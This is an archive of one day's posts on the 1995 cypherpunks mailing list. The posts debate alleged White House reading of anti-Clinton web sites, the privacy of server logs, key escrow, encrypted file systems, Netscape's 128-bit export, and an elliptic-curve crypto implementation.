Note: These issues will be discussed at the Key Escrow Standards Development Workshop to be held September 15, 1995 (9:00 a.m. - 5:00 p.m.) at the Gaithersburg Hilton Hotel, 620 Perry Parkway, Gaithersburg, Maryland. The meeting will be open to the public, although seating is limited. Advance registration is requested, please contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e-mail: carlton at micf.nist.gov.
9/6/95

----------------------------------------------------------------------------

From bdavis at thepoint.net Tue Sep 12 14:56:35 1995
From: bdavis at thepoint.net (Brian Davis)
Date: Tue, 12 Sep 95 14:56:35 PDT
Subject: Whitehouse "dissident" web site monitoring?
In-Reply-To: <9509121717.AA03226@anon.penet.fi>
Message-ID:

On Tue, 12 Sep 1995 an215712 at anon.penet.fi wrote:

>
> - ----------------------------------------------------------
>
>       WHITE HOUSE MONITORING OF DISSIDENTS ON THE INTERNET
>       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^!!!

Unbelievable!!! To add to this distressing truth, I have learned that the White House also subscribes to a number of newspapers and periodicals which are reviewed for things of interest to the Administration and to the President. I I I I I I ammmmmmmmmm shocked!

Ooops. Dog bites man.

And do you really think the White House couldn't hire a couple of net gurus to sniff packets if they wanted to hide their "monitoring"(=reading).

EBD

>
> The National Security Agency presumably can monitor
> subversive communication on the Internet without leaving any
> trace by "sniffing packets" at traffic nodes. For purely
> political purposes, however, the White House may be forced to do
> the monitoring in-house, which means that they leave traces
> everywhere they go.
>
> With just a superficial search for such traces, The
> Washington Weekly has uncovered intensive monitoring of
> "dissident" Internet sites by the White House.
>
> It turns out that computers from inside the White House have
> kept pretty good tabs on information available on Whitewater,
> Vince Foster, and Mena at a few key repositories on the World-
> Wide Web, a subset of the Internet.
>
> Just three such sites: "The Washington Weekly," "The
> Whitewater Scandal Home Page" and "Whitewater & Vince Foster,"
> were accessed 128 times by four computers from the Executive
> Office of the President between August 28 and August 31.
> If the
> White House is showing a similar interest in other sites on the
> World Wide Web, that would amount to a monitoring operation of
> considerable magnitude. Tim Brady of the Yahoo! World-Wide Web
> index says that his company alone has indexed approximately 725
> political sites. That monitoring effort would be nothing,
> however, compared to the effort required to follow all anti-
> Clinton discussion on the Usenet, another subset of the Internet.
>
> The White House did not respond to an inquiry (attached
> below) asking for an explanation and asking whether this
> constituted "casual browsing."
>
> Interestingly, the week after the White House snooping of
> files, which included a series of articles by J. Orlin Grabbe on
> Vince Foster's ties to the NSA, the following little piece
> appeared in Newsweek Magazine:
>
>   "Conspiracy theorists perked up when Deborah Gorham told Senate
>   Whitewater investigators in June that her boss, the late deputy
>   White House counsel Vince Foster, asked her to put two secret
>   notebooks from the National Security Agency in a White House
>   safe. The suggestion that Foster dealt with the NSA sparked
>   feverish speculation on the Internet that he was involved in
>   espionage. The reality appears more prosaic. The White House
>   won't give details, but sources say Foster's files dealt with
>   legal questions about national emergencies...."
>
>
> Does the White House follow anti-Clinton discussion on Usenet
> newsgroups just as closely? The White House posts press releases
> to Usenet in collaboration with the Artificial Intelligence Lab
> at Massachusetts Institute of Technology. But MIT System
> Administrator Bruce Walton says that the White House does not use
> the same server for reading netnews. It would be difficult -
> although not impossible - to find the server that the White House
> uses for reading or receiving netnews and check for traces on
> that server.
>
> Readers may be tempted to post a threat to the President on a
> newsgroup just to see if they get a visit from the Secret Service
> the next day. That experiment is not advisable. It is a criminal
> offense. But Usenet just might be a faster conduit for getting
> the attention of the administration than the email address that
> the White House has published for the president.
>
>
>
>
>
> Attachment:
>
>
>
>                   THE WASHINGTON WEEKLY
> _________________________________________________________________
>
> August 31, 1995
>
> Virginia M. Terzano
> White House Office of the Press Secretary
> The White House
>
>
> Dear Ms. Terzano:
>
> It has come to my attention that several dissident sites on
> the World Wide Web have been visited by White House computers
> this week. Apparently, all information regarding Whitewater,
> Foster, and Mena has been transferred to White House computers.
>
> Specifically, the sites,
>
> "Washington Weekly" (http://www.federal.com),
> "The Whitewater Scandal Home Page"
> (http://www.cs.dartmouth.edu/~crow/whitewater/)
> "Whitewater & Vince Foster"
> (http://www.cris.com/~dwheeler/n/whitewater/whitewater-index.html)
>
> have been visited by White House computers ist1.eop.gov,
> ist6.eop.gov, ist7.eop.gov, and gatekeeper.eop.gov between August
> 28 and August 31, and a total of 128 files have been transferred
> to those White House computers. For all sites, this constitutes a
> significant increase over previous access by White House
> computers.
>
> In light of this information, I have the following questions:
>
> (1) Does this constitute "casual browsing" by White House staff, or
>     is it, in light of the considerable time and effort spent during
>     regular business hours, part of a monitoring or intelligence operation?
>
> (2) For what purpose is the information transferred to the White House used?
>
> (3) Does the White House keep information from these web sites on file,
>     and does the White House keep a file on the persons responsible for
>     these web sites?
>
> (4) Is the April 9 statement by David Lytel of the White House Office of
>     Science and Technology to Amy Bauer of Copley News Service that the
>     administration does not monitor anti-Clinton activity on the web still
>     operative?
>
>
> Thank you very much for your cooperation in this matter.
>
> Sincerely,
>
> Marvin Lee
> The Washington Weekly
>
>
>
>
> Copyright (c) 1995 The Washington Weekly (http://www.federal.com)
>
>
> ----------------------------------------------------------------------------
> To find out more about the anon service, send mail to help at anon.penet.fi.
> If you reply to this message, your message WILL be *automatically* anonymized
> and you are allocated an anon id. Read the help file to prevent this.
> Please report any problems, inappropriate use etc. to admin at anon.penet.fi.
>

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame way! I get treated worse in person every day!!

From Richard.Johnson at Colorado.EDU Tue Sep 12 15:06:04 1995
From: Richard.Johnson at Colorado.EDU (Richard Johnson)
Date: Tue, 12 Sep 95 15:06:04 PDT
Subject: Leaked NSI PR About $50-Annual-Fee-for-Domain-Name
Message-ID:

Here's a pointer to a very interesting draft press release, apparently scheduled for release on 18 September 1995.

Short version: The article specifies $100 one-time fee for new domain name registrations, and a $50/year annual fee for all .com, .edu, .gov, .net, and .org domains.
Long version:

> From: rpwhite at best.com (rpwhite)
> Newsgroups: best.general,best.announce,best.www,ba.internet,comp.protocols.tcp-ip.domains,talk.bizarre
> Subject: INTERNET BEGINS FEE-BASED REGISTRATION
> Date: 12 Sep 1995 12:18:18 -0700
> Organization: BEST Internet (415) 964-2378
> Lines: 495
> Approved: dillon at best.com
> Message-ID: <434mdq$c3r at shell1.best.com>
> NNTP-Posting-Host: shell1.best.com

From aleph1 at dfw.net Tue Sep 12 15:13:00 1995
From: aleph1 at dfw.net (Aleph One)
Date: Tue, 12 Sep 95 15:13:00 PDT
Subject: Scientology tries to break PGP - and (fwd)
In-Reply-To: <199509122056.NAA19963@netcom19.netcom.com>
Message-ID:

In that case you must try CFS or Crypto File System. Not implemented in a partition or in the kernel like SFS but as a user level loopback NFS server. It's quite nice.

Aleph One / aleph1 at dfw.net
http://underground.org/

On Tue, 12 Sep 1995, Tom Rollins wrote:

> Date: Tue, 12 Sep 1995 13:56:18 -0700 (PDT)
> From: Tom Rollins
> To: cypherpunks at toad.com
> Subject: Re: Scientology tries to break PGP - and (fwd)
>
> > I would just like to point out that, when a LEA comes to you
> > to get at the contents of your computer, (s)he is not going to
> > patiently wait while your system wipes the offending evidence off your
> > hard disk. The first thing they do is make a copy of everything, so
> > they can work from the copy. Besides, you do have backup tapes laying
> > around all over the place, don't you?
>
> Sounds like a recommendation for SFS (Secure File System).
> It encrypts everything going to the disk.
> I used an SFS partition for a while. But, I swap between
> DOS and Linux. Haven't seen SFS for Linux yet.
>
> Later,
> Tom
>

From adwestro at ouray.cudenver.edu Tue Sep 12 15:27:02 1995
From: adwestro at ouray.cudenver.edu (Alan Westrope)
Date: Tue, 12 Sep 95 15:27:02 PDT
Subject: Denver area meeting, SUNDAY, 9/17, 2 pm
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

As usual, we'll congregate at the food court in the basement of the Tivoli, near the confluence of Larimer St., Speer Blvd., and the Auraria Parkway, and perhaps drift off to nearby libraries or restaurants after an hour or two. Email for directions or more info.

Alan Westrope   __________/|-,
                (_)   \|-'   2.6.2 public key: finger / servers
PGP 0xB8359639: D6 89 74 03 77 C8 2D 43 7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: I *swear* I have not used the term 'big-endian' in the last 10 years.

iQCVAwUBMFYHkFRRFMq4NZY5AQGuGwQAmOqG0gpZHlUsmQxHcCfA2Hg30LQH9FXN
xgz+gZuMWLFDNIZp/5bmodK18B4NpE4AtJH9QhA8kngb11/onVAu8aiw/EFGbTyT
yHF2NVN20gGOGAYbeJzpUWHnJhPUB9QYszdwc8K0VvDtYfxq/H8mDfgDiGjNenCG
z8ryBpKWYkQ=
=cscS
-----END PGP SIGNATURE-----

From alano at teleport.com Tue Sep 12 15:48:37 1995
From: alano at teleport.com (Alan Olsen)
Date: Tue, 12 Sep 95 15:48:37 PDT
Subject: Netscape to patch shareware version
Message-ID: <199509122248.PAA21902@desiree.teleport.com>

At 11:00 PM 9/12/95 +0200, you wrote:
>>| Netscape said it received word last week that the State Department had
>>| cleared that version for release on the Net, but only within the U.S.,
>>| owing to current export laws banning the export of encryption schemes
>>| stronger than 40 bits. The company could provide no details by press
>>| time on how it would ensure that the 128-bit version wouldn't leak beyond
>>| U.S. borders.
>>
>>Ok, any bet on how long it will take?
>
>It's already been exported. Evidently, one of those who bought the commercial
>version sent it to Europe as soon as it was out.

The Netscape "personal edition" was available in Europe on some store shelves soon after its release.
(The PE edition of Netscape has the 128 bit encryption.)

As for what Netscape will do in this case... They had made plans to release the 128 bit version in a method similar to what MIT uses, but they found that they could actually get people to buy a copy if they kept that one as only available by ordering it. (Who says that people will not pay for encryption?)

Now all they need to do is come out with a version with a bigger key. (Hint, hint...)

I will keep my personal feelings about Netscape to a minimum here. There are certain things that they do well and there are others they do not. But those problems will continue to be forwarded to Dave Null... Well, on to more profitable things.

>
>I note the site removed it, however, probably because Netscape Comm. Inc. requested that they do so. Netscape generally objects to anyone else carrying their browser (.edu sites with prior permission excepted).
>
>
>
>

| Minister of Forced Caffinization in the DNRC     | alano at teleport.com |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!" | Ignore the man      |
| -- PGP 2.6.2 key available on request --        | behind the keyboard.|
| http://www.teleport.com/~alano                  |                     |

From jim at acm.org Tue Sep 12 16:07:16 1995
From: jim at acm.org (Jim Gillogly)
Date: Tue, 12 Sep 95 16:07:16 PDT
Subject: GAK/weak crypto rationale?
In-Reply-To:
Message-ID: <199509122307.QAA02486@mycroft.rand.org>

> Brian Davis writes:
> No question. Many high profile public corruption, Mafia, and high-level...
> ...In our district, we managed to convict almost 20 people...
> Particularly effective were the court-approved video and audio tapes of...
> I don't doubt that wiretaps may sometimes be abused despite the
> incredibly onerous review process, but they have positive aspects, too.

In how many of these cases did you fail to get the necessary information because of encryption? Has this proportion been changing over the years?
	Jim Gillogly
	Hevensday, 21 Halimath S.R. 1995, 23:06

From fc at all.net Tue Sep 12 16:19:43 1995
From: fc at all.net (Dr. Frederick B. Cohen)
Date: Tue, 12 Sep 95 16:19:43 PDT
Subject: new info-sec mailing list
Message-ID: <9509122318.AA13685@all.net>

Info-sec heaven is introducing a new mailing list. Unlike many of the Internet's mailing lists, this is not an open forum for people on the Internet to exchange ideas. Rather, it is a monthly mailing used to inform readers of new information that can be found in info-sec heaven.

If you would like to be informed of new information, services, search capabilities, protection software, articles, books, and other information that appears in info-sec heaven without having to come in periodically and look for yourself, please let us know by sending email to fc at all.net and we will add you to our monthly list.

Thank you for your time.

--
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236

From nobody at armadillo.com Tue Sep 12 16:22:50 1995
From: nobody at armadillo.com (Anonymous Remailing Service)
Date: Tue, 12 Sep 95 16:22:50 PDT
Subject: No Subject
Message-ID: <199509122323.SAA23651@monad.armadillo.com>

E. Brian sed:

>Unbelievable!!! To add to this distressing truth, I have learned that
>the White House also subscribes to a number of newspapers and periodicals
>which are reviewed for things of interest to the Administration and to
>the President. I I I I I I ammmmmmmmmm shocked!

mebbe tha Slickster just wants to know who orlin's "Deep Throat" is... Keep checkin' them fingerprints, Willie!

>Ooops. Dog bites man.

>And do you really think the White House couldn't hire a couple of net
>gurus to sniff packets if they wanted to hide their "monitoring"(=reading).

who sez they dont post, too?
heh

From hallam at w3.org Tue Sep 12 16:23:36 1995
From: hallam at w3.org (hallam at w3.org)
Date: Tue, 12 Sep 95 16:23:36 PDT
Subject: Whitehouse "dissident" web site monitoring?
In-Reply-To: <9509121717.AA03226@anon.penet.fi>
Message-ID: <9509122322.AA22126@zorch.w3.org>

Hang on a sec, what is meant to be the conspiracy? I don't see any relationship to cryptography here. The material in question was published very publicly. If you make a public statement about a person then they have a right to hear it.

I see that the message on log file confidentiality is not getting through though.

I happen to know that the US government is very interested in hearing the views of its citizens, and also the views of citizens of other countries. They are interested in particular about views relating to the actions of the US government, what the government is doing and what it could do. "anti-president views" are of great importance if it is known why those views are held. In my country we call that listening.

I have just spent a couple of days talking with a group of people looking at how we can do that better. There is a considerable barrier to being involved in the political process, perhaps the Web can reduce that barrier. The problem being how to handle the massive amounts of input.

> Readers may be tempted to post a threat to the President on a
>newsgroup just to see if they get a visit from the Secret Service
>the next day. That experiment is not advisable. It is a criminal
>offense.

DO NOT DO THIS. The secret service is required by law to investigate every single threat. This costs a very considerable amount of money which comes from your taxes. There is no discretion in the matter. Hence the only method of reducing the number of alarms is to arrest people and make an example of them. Unless you want to be the example do not do this.
>have been visited by White House computers ist1.eop.gov,
>ist6.eop.gov, ist7.eop.gov, and gatekeeper.eop.gov between August
>28 and August 31, and a total of 128 files have been transferred

I don't know which those machines are, however there are a large number of Web browsers in the Whitehouse and there are a large number of staffers. There is also a Web browser outside the oval office for visitors to use while they are waiting. If you make it your business to print nasty material about people then don't be surprised if they read it. The material has probably been picked up by a search engine in any case.

There is no conspiracy here unless you are very determined to find one. Given the nature of the article it does not appear that a balanced view of the administration was being sought in any case. I happen to know that Newt Gingrich's staffers and Weld's staffers also surf the Web, are they "monitoring anti-Newt dissidents?", I suspect not. I don't get the impression that our anonymous source has sent a complaint in that direction.

I spend a considerable amount of time getting people in power to listen to the net community. I get very pissed off when a bunch of conspiracy nuts try to make out that they have been doing anything wrong when they do.

As a matter of ethics I consider information in log files private. This was certainly considered to be the case in the Marty Rimm affair. The posting was clearly designed to intimidate the Whitehouse staffers into not visiting those sites, it was possible that they might have lost their net.access entirely as a result of the complaint. I consider the letter sent to Terzano to be unethical since the staffers had a right to expect their privacy to be preserved.

If people want to talk about cryptography and the President we can discuss whether he should put a digital signature on his press releases.
I think the use of the word dissident in the message is an insult, both to the dissidents in Eastern Europe and other places who have suffered genuine persecution and to the democratic institutions and people of the United States.

Phill Hallam-Baker
Not speaking for anyone else.

From perry at piermont.com Tue Sep 12 17:32:40 1995 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 12 Sep 95 17:32:40 PDT Subject: No Subject In-Reply-To: Message-ID: <199509130032.UAA16308@frankenstein.piermont.com>

Tom Jones writes:
> The ones I've heard about are SKIP, Photuris and ISAKMP(sp?).

ISAKMP is really a metaprotocol, and SKIP doesn't fit the IPSP model well -- it never was much of a candidate...

.pm

From cryptech at Mars.mcs.com Tue Sep 12 17:34:40 1995 From: cryptech at Mars.mcs.com (Mike Rosing) Date: Tue, 12 Sep 95 17:34:40 PDT Subject: Elliptic Curve Public Key Crypto available In-Reply-To: <9509121658.AA00550@ch1d157nwk> Message-ID:

On Tue, 12 Sep 1995, Andrew Loewenstern wrote:
> What about NeXT's Fast Elliptic Encryption (FEE)? Their research guy,
> Richard Crandall, came up with major speedups to elliptic curve encryption.
> In fact, there was a simple cryptosystem that shipped as a demo with NeXTSTEP
> 2.0. What was most interesting about this system was that it didn't store
> any keys anywhere; your public/private key pair was generated _on the fly_
> from your passphrase every time you encrypted or decrypted....on a 25 MHz
> 68040 too... and it was fast! It wasn't that great of an implementation
> (you _really_ need a lot of bits of entropy in that passphrase, and you can't
> change your passphrase without changing your PK), but it shows how fast
> NeXT's speedups are. And this was in 1990...
>
> I'm not sure if the speedups are patented, but you could try a literature
> search. If it really is fast then it could mean good things for servers that
> need to do a lot of encryption/decryption for interaction with clients.

Yes, the speedups are patented.
Their system relied on very specific curves with very specific properties. I purposely avoided coding up their method because of that. Their method is described in patent #5,159,632 dated Oct 27, 1992 and it uses a different equation (supersingular version) than what I implemented. The price is slower speed, but with 100 MHz processors you won't notice.

Patience, persistence, truth,
Dr. mike

From bdavis at thepoint.net Tue Sep 12 17:39:33 1995 From: bdavis at thepoint.net (Brian Davis) Date: Tue, 12 Sep 95 17:39:33 PDT Subject: Digital Fingerprinting In-Reply-To: <9509121745.AA19687@toad.com> Message-ID:

On Tue, 12 Sep 1995, Peter Trei wrote:
> > Finding the mail mixed in there is evidence that supports the "charge"
> > but surely can be rebutted. When I was practicing in a small town c.
> > 1984, people would be summoned (sent a paper telling them to show up) to
> > court for illegal dumping if their mail was found with other trash, old
> > refrigerators, etc., in a creek somewhere. Those charged could always
> > put on proof that Billy Bob's garbage service picked up their trash ...
>
> > The sentence was almost always to go and pick up some multiple of the
> > garbage found and take it to the landfill.
>
> This was Stockbridge, in MA, right :-?

No, it was in Western Kentucky with a week or two of a family's garbage and maybe a worn out appliance or two. No garbage pickup provided by the county; private haulers expensive; dropping much at the landfill both inconvenient and "unnecessary" given the availability of hard to find valleys and creeks.

EBD

> That's what we did, and drove back to the church, had a
> thanksgiving dinner that couldn't be beat, went to sleep and didn't
> get up until the next morning, when we got a phone call from officer
> Obie. Said "Kid, we found your name on an envelope at the bottom of a
> half a ton of garbage, and just wanted to know if you had any
> information bout it". I said "Yes Sir Officer Obie, I cannot tell a
> lie, I put that envelope under that garbage."
> (c) Arlo Guthrie
>
> Peter Trei
> Senior Software Engineer
> Purveyor Development Team
> Process Software Corporation
> http://www.process.com
> trei at process.com

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame way! I get treated worse in person every day!!

From tcmay at got.net Tue Sep 12 18:03:49 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 12 Sep 95 18:03:49 PDT Subject: Whitehouse "dissident" web site monitoring? Message-ID:

I strongly agree with the views of Phill Hallam-Baker and Brian Davis, and perhaps others who make the same points, that access by the White House to the various Web sites is NO BIG DEAL. I go further: I have no concerns about the NSA reading _this_ list! After all, it's a public list, so all are free to read it. Also, it may be very useful for the Feds to be seeing what we are arguing. We don't believe in "security through obscurity," do we? The notion that we are "safe" if the White House, or (horrors!) Janet Reno herself, are not reading our list or the Web sites on various issues, is the same kind of security the ostrich thinks he has with his head in the sand and his butt in the air. If you want to be unheard by the Feds, and the White House, and the FBI, and GCHQ, and Mossad, etc., then don't post publicly. If you want your own access to Web sites kept private, push for the development of Web proxies ("Web remailers"). And so forth. Security is in our own hands, as it should be (and as "complex mathematics" has made it). (In the U.S. and most Western countries--actually, an increasing number of countries, worldwide--it is not easy to prosecute and convict a citizen for mere views expressed, or for reading preferences, etc.
Although I am thought of as a "crypto anarchist," and basically am such a thing, the fact is that there aren't a lot of trials for thoughtcrime in this country. I have some doubts about the circumstances surrounding Danny Casolaro's death, though, so I don't say all is rosy and perfect. I just say that paranoia that the White House or the FBI is reading public items is unwarranted.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From mnorton at cavern.uark.edu Tue Sep 12 18:41:32 1995 From: mnorton at cavern.uark.edu (Mac Norton) Date: Tue, 12 Sep 95 18:41:32 PDT Subject: GAK In-Reply-To: <199509121457.KAA28748@panix.com> Message-ID:

What's technology got to do with it, in principle? If I write a letter in code, do I have to send the FBI the key, just in case? I don't see anything complicated about this--Director Freeh wants more wiretapping ability than he's got now, and I have no doubt that that expansion of FBI power would be good for national security and law enforcement. So would an FBI camcorder in every room of every house. The question is where to draw the line, and I'd rather let the lines draw themselves, as opposed to having citizens be compelled to draw them. The telephone system, Mr. Freeh's preferred analog, is inherently susceptible to tapping, but what if it were not, and every telephone were required to be equipped with a government tap switch, subject to warrant, of course? I don't think I'd like that. Would you?

MacN

On Tue, 12 Sep 1995, Duncan Frissell wrote:
> At 09:25 PM 9/3/95 -0400, Brian Davis wrote:
>
> >I, of course, know of the "dislike" of GAK here. I am curious to know,
> >however, if the "dislike" is because government would have access under
> >any circumstances or if the primary worry is that government will cheat
> >and get access when most would agree that they shouldn't (either by the
> >judge "cheating" or a TLA stealing it).
>
> If we can deploy technologies to protect our freedom to communicate the way
> *we* choose to, then we have the right to do so. Beyond rights, we have the
> power to do so --- which is worth even more.

From perry at piermont.com Tue Sep 12 18:49:18 1995 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 12 Sep 95 18:49:18 PDT Subject: Whitehouse "dissident" web site monitoring? In-Reply-To: Message-ID: <199509130148.VAA16414@frankenstein.piermont.com>

Linda Thompson, American Justice Federation writes:
> During the Waco Hearings, Charles Schumer said he'd seen Foster's
> missing file and all it had in it was a memorandum about "Linda
> Thompson and THAT tape."

My, aren't the paranoid nutcases getting self important. Please do not pollute cypherpunks with this crap.

Perry

From jirib at cs.monash.edu.au Tue Sep 12 18:59:19 1995 From: jirib at cs.monash.edu.au (Jiri Baum) Date: Tue, 12 Sep 95 18:59:19 PDT Subject: Scientology and police visit XS4ALL Amsterdam In-Reply-To: Message-ID: <199509130156.LAA29400@molly.cs.monash.edu.au>

-----BEGIN PGP SIGNED MESSAGE-----

Hello starrd and Ray Cromwell, cg at bofh.lake.de, cypherpunks at toad.com

starrd wrote:
> On Thu, 7 Sep 1995, Jiri Baum wrote:
...
> > >: : >>: ...[snip]
> I gotta read more of this drivel! ROTFL! ROTFL!!!
...

I feel I should point out that you have no proof that the text you have attributed to me was in fact posted by me, and in fact you have reason to believe otherwise since I usually PGP-sign my entire post including any signature.

> I know this is somewhat off-topic, but I just *had* to say it!

Off topic, but I have been publicly accused so I feel I should publicly respond in the same forum.
Jiri

-- PGP 463A14D5

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
-----END PGP SIGNATURE-----

From cryptech at Mars.mcs.com Tue Sep 12 19:19:34 1995 From: cryptech at Mars.mcs.com (Mike Rosing) Date: Tue, 12 Sep 95 19:19:34 PDT Subject: generating hash.curve in eliptic.src Message-ID:

Among other comments, it was pointed out that I had not included "hash.curve". To generate this file I did the following:

    /* Types and routines (POINT, CURVE, init_opt_math, init_rand,
       rand_curv_pnt, save_curve, close_rand) come from eliptic.src. */
    int main(void)
    {
        POINT point;
        CURVE curve;

        init_opt_math();                        /* set up optimal normal basis math */
        init_rand();                            /* seed the random source */
        rand_curv_pnt(point, curve);            /* pick a random curve and a point on it */
        save_curve("hash.curve", curve, point); /* write both out for the hash code to load */
        close_rand();
        return 0;
    }

This was done during development and I forgot about it. A simpler patch is to fix an error finding the file with a call to rand_curv_pnt to generate it. Kind of interesting that way for hashing your secret key. If everyone uses a different curve to generate their secret key, access to the machine is necessary to even begin to think about cracking any pass phrase. Don't know if it actually adds any security, but it is an interesting concept. As for why I didn't put up a tar file, no particular reason. It's source for a particular machine (MachTen on a Mac) and I figured every C compiler is different so some hacking will be required by anyone interested. Once more bugs are fixed such as the one above, I'll put it up in a more easily compilable form. And thanks for the comments so far. I'll do my best to keep up with them.

Patience, persistence, truth,
Dr. mike

From hallam at w3.org Tue Sep 12 19:27:57 1995 From: hallam at w3.org (hallam at w3.org) Date: Tue, 12 Sep 95 19:27:57 PDT Subject: Whitehouse "dissident" web site monitoring? In-Reply-To: Message-ID: <9509130226.AA22319@zorch.w3.org>

> Ooops. Dog bites man.
> And do you really think the White House couldn't hire a couple of net
> gurus to sniff packets if they wanted to hide their "monitoring"(=reading).

Yes, they are far too cheap to hire, they would go off somewhere and schmooze the info outa folks. If they ever want an anonymous proxy server they are welcome to use ours.

Seriously folks I'm very pissed about the abuse of log file information. The Whitehouse restricts browsing privileges to a chosen few. The attempt to make a big deal out of it could have cost someone their job (it didn't in this case). If we are serious about privacy I think we should be very clear that we respect the privacy of Whitehouse staffers and staffers in the Senate and House. I'm not being partisan about this, I have put a lot of effort into getting participation from the right as well as the left. I've just not been very successful in that area.

Phill

From rsalz at osf.org Tue Sep 12 19:56:29 1995 From: rsalz at osf.org (Rich Salz) Date: Tue, 12 Sep 95 19:56:29 PDT Subject: Whitehouse "dissident" web site monitoring? Message-ID: <9509130255.AA03446@sulphur.osf.org>

> Seriously folks I'm very pissed about the abuse of log file information. The

What abuse? Is there an expectation of privacy in Web-world, such that all users can honestly expect that a site is compelled to keep its "visitor log" private?

Surely not.

From mnorton at cavern.uark.edu Tue Sep 12 20:17:24 1995 From: mnorton at cavern.uark.edu (Mac Norton) Date: Tue, 12 Sep 95 20:17:24 PDT Subject: Digital Fingerprinting In-Reply-To: Message-ID:

Then, in W.Ky., as in Stockbridge, "You can get anything you want..."? :)

MacN

On Tue, 12 Sep 1995, Brian Davis wrote:
> On Tue, 12 Sep 1995, Peter Trei wrote:
>
> > > Finding the mail mixed in there is evidence that supports the "charge"
> > > but surely can be rebutted. When I was practicing in a small town c.
> > > 1984, people would be summoned (sent a paper telling them to show up) to > > > court for illegal dumping if their mail was found with other trash, old > > > refrigerators, etc., in a creek somewhere. Those charged could always > > > put on proof that Billy Bob's garbage service picked up their trash ... > > > > > The sentence was almost always to go and pick up some multiple of the > > > garbage found and take it to the landfill. > > > > This was Stockbridge, in MA, right :-? > > No, it was in Western Kentucky with a week or two of a family's garbage > and maybe a worn out appliance or two. No garbage pickup provided by the > county; private haulers expensive; dropping much at the landfill both > inconvenient and "unnecessary" given the availability of hard to find > valleys and creeks. > > EBD > > > > That's what we did, and drove back to the church, had a > > thanksgiving dinner that couldn't be beat, went to sleep and didn't > > get up until the next morning, when we got a phone call from officer > > Obie. Said "Kid, we found your name on an envelope at the bottom of a > > half a ton of garbage, and just wanted to know if you had any > > information bout it". I said "Yes Sir Officer Obie, I cannot tell a > > lie, I put that envelope under that garbage." > > (c) Arlo Guthrie > > > > > > > > > > Peter Trei > > Senior Software Engineer > > Purveyor Development Team > > Process Software Corporation > > http://www.process.com > > trei at process.com > > > > Not a lawyer on the Net, although I play one in real life. > ********************************************************** > Flame way! I get treated worse in person every day!! > > From bdavis at thepoint.net Tue Sep 12 20:33:54 1995 From: bdavis at thepoint.net (Brian Davis) Date: Tue, 12 Sep 95 20:33:54 PDT Subject: Digital Fingerprinting In-Reply-To: Message-ID: On Tue, 12 Sep 1995, Mac Norton wrote: > Then, in W.Ky., as in Stockbridge, "You can get > anything you want..."? 
:) I'd stick with: *********************************************** You can't always get what you want 1 but if you try sometimes, sometimes you get what you need. 2 *********************************************** 1 ability to dump garbage where you want 2 a better appreciation for the environment :-) EBD > MacN > > On Tue, 12 Sep 1995, Brian Davis wrote: > > > On Tue, 12 Sep 1995, Peter Trei wrote: > > > > > > Finding the mail mixed in there is evidence that supports the "charge" > > > > but surely can be rebutted. When I was practicing in a small town c. > > > > 1984, people would be summoned (sent a paper telling them to show up) to > > > > court for illegal dumping if their mail was found with other trash, old > > > > refrigerators, etc., in a creek somewhere. Those charged could always > > > > put on proof that Billy Bob's garbage service picked up their trash ... > > > > > > > The sentence was almost always to go and pick up some multiple of the > > > > garbage found and take it to the landfill. > > > > > > This was Stockbridge, in MA, right :-? > > > > No, it was in Western Kentucky with a week or two of a family's garbage > > and maybe a worn out appliance or two. No garbage pickup provided by the > > county; private haulers expensive; dropping much at the landfill both > > inconvenient and "unnecessary" given the availability of hard to find > > valleys and creeks. > > > > EBD > > > > > > > That's what we did, and drove back to the church, had a > > > thanksgiving dinner that couldn't be beat, went to sleep and didn't > > > get up until the next morning, when we got a phone call from officer > > > Obie. Said "Kid, we found your name on an envelope at the bottom of a > > > half a ton of garbage, and just wanted to know if you had any > > > information bout it". I said "Yes Sir Officer Obie, I cannot tell a > > > lie, I put that envelope under that garbage." 
> > > (c) Arlo Guthrie > > > > > > > > > > > > > > > Peter Trei > > > Senior Software Engineer > > > Purveyor Development Team > > > Process Software Corporation > > > http://www.process.com > > > trei at process.com > > > > > > > Not a lawyer on the Net, although I play one in real life. > > ********************************************************** > > Flame way! I get treated worse in person every day!! > > > > > Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame way! I get treated worse in person every day!! From bdavis at thepoint.net Tue Sep 12 20:47:39 1995 From: bdavis at thepoint.net (Brian Davis) Date: Tue, 12 Sep 95 20:47:39 PDT Subject: your mail In-Reply-To: <199509122323.SAA23651@monad.armadillo.com> Message-ID: On Tue, 12 Sep 1995, Anonymous Remailing Service wrote: > E. Brian sed: > > > >Unbelievable!!! To add to this distressing truth, I have learned that > >the White House also subscribes to a number of newspapers and periodicals > >which are reviewed for things of interest to the Administration and to > >the President. I I I I I I ammmmmmmmmm shocked! > > mebbe tha Slickster just wants to know who orlin's "Deep Throat" is... > Keep checkin' them fingerprints, Willie! Certainly, Orlin's postings are of primary interest to everyone. Perhaps the White House Staff needs a new fiction writer for the next State of the Union address!! :-) > >Ooops. Dog bites man. > >And do you really think the White House couldn't hire a couple of net > >gurus to sniff packets if they wanted to hide their "monitoring"(=reading). > > who sez they dont post, too? > heh Your scoop related to net monitoring, not posting. I anxiously await your sequel. And so what if they did post. Maybe you are concerned about anonymous posting from the Administration??? And technically speaking, I guess, I am part of the Administration as an employee of the Executive Branch with some discretion in how I do my job. 
In the same sense, I was a part of Bush's Administration. Having had two rounds of off topic posting on this thread, I intend to give you the last word. I hope I can resist posting in response to what I am sure will be a thoughtful and enlightening reply.

Sauron

Not a lawyer on the Net, although I play one in real life.
**********************************************************
